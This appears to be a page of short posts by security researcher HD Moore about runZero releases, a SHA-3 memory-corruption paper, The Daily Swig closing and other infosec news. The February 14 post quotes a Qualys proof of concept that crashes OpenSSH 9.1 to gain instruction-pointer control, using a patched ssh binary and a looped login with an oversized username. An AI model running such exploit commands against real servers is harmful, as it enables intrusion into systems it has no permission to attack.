home > posts
  • May 11, 2023
    HD Moore
    @hdm

    It's definitely that time of the week.

    ↪ reply
  • May 9, 2023
    HD Moore
    @hdm

    I had a blast working on the latest version of runZero (https://www.runzero.com/blog/runzero-3.8/).

    Writing queries that attach vulnerabilities to assets feels like a strange mash-up of SIEM threat hunting, vulnerability scanning, and a shodan safari.

    ↪ reply
  • April 11, 2023
    HD Moore
    @hdm

    #python  #networkdiscovery  #inventory  #infosec 

    runZero 3.7 is live with support for custom integrations, a new python SDK, a Service Now Graph Connector, and a bucket of new fingerprints and protocols. The hosted scan engines now support scanning up to a /8 at a time on all ports (!). Free trials (and a free tier) even if you don't want to share a corporate email address:
    https://www.runzero.com/blog/runzero-3.7/

    #python #networkdiscovery #inventory #infosec

    ↪ reply
  • March 24, 2023
    HD Moore
    @hdm

    #troubleshooters 

    Production by The #TroubleShooters is unexpectedly out TODAY: https://thetroubleshooters.bandcamp.com/album/production (int eighty & kHill) !!!

    ↪ reply
  • March 7, 2023
    HD Moore
    @hdm

    I love crypto research that demonstrates practical attacks. The paper `A Vulnerability in Implementations of SHA-3, SHAKE, EdDSA, and Other NIST-Approved Algorithm` by Nicky Mouha and Christopher Celi demonstrates RCE (!) through controlled memory corruption in the final-round update of the Keccak code used by SHA-3. This implementation bug affected Python, PHP, and the SHA-3 Ruby package: https://eprint.iacr.org/2023/331

    Bonus points for dropping a Metasploit reverse TCP payload!

    ↪ reply
  • March 5, 2023
    HD Moore
    @hdm

    @galdor@emacs.ch I like @mbmcloughlin's wrapper that puts pprof on it's own server and enable/configure this via environment variables: github.com/mmcloughlin/professor

    ↪ reply
  • March 2, 2023
    HD Moore
    @hdm

    Holy cow. The Daily Swig by PortSwigger, one of my favorite reads, is shutting down due to law suits and drama: https://portswigger.net/daily-swig/were-going-teetotal-its-goodbye-to-the-daily-swig

    "We have written stories about numerous bad actors, some of whom are well-funded, and we have been obliged to pay settlements for malicious legal actions. We have sometimes been targeted by activists seeking to damage our software business because they dislike our story. This reality made it harder to justify continuing with the Swig."

    Thank you for the great articles over the years, you will be missed!

    ↪ reply
  • February 26, 2023
    HD Moore
    @hdm

    #golang  #infosec 

    I love using Burp Pro for security testing, but it's also weirdly good at finding deeply-buried concurrency issues and race conditions.

    #golang #infosec

    ↪ reply
  • February 14, 2023
    HD Moore
    @hdm

    This post by the Qualys Security Advisory team demonstrating rip/pc control on OpenSSH 9.1 (running on OpenBSD!) is savage: https://seclists.org/oss-sec/2023/q1/92

    Here I was thinking this bug was hopeless and they one-line it without writing new code:

    $ cp -i /usr/bin/ssh ./ssh

    $ sed -i s/OpenSSH_9.1/FuTTYSH_9.1/g ./ssh

    $ user=`perl -e 'print "A" x 300'` && while true ;do ./ssh -o NumberOfPasswordPrompts=0 -o Ciphers=aes128-ctr -l
    "$user:$user" 192.168.56.123 ;done

    ...

    #1 0x4141414141414141 in ?? ()

    ↪ reply
  • February 8, 2023
    HD Moore
    @hdm

    A neat post by @foote & co at Fastly: A first look at Chrome's TLS ClientHello permutation in the wild https://www.fastly.com/blog/a-first-look-at-chromes-tls-clienthello-permutation-in-the-wild

    ↪ reply
  • << View newer posts View older posts >>

Copyright 1998-2026 HD Moore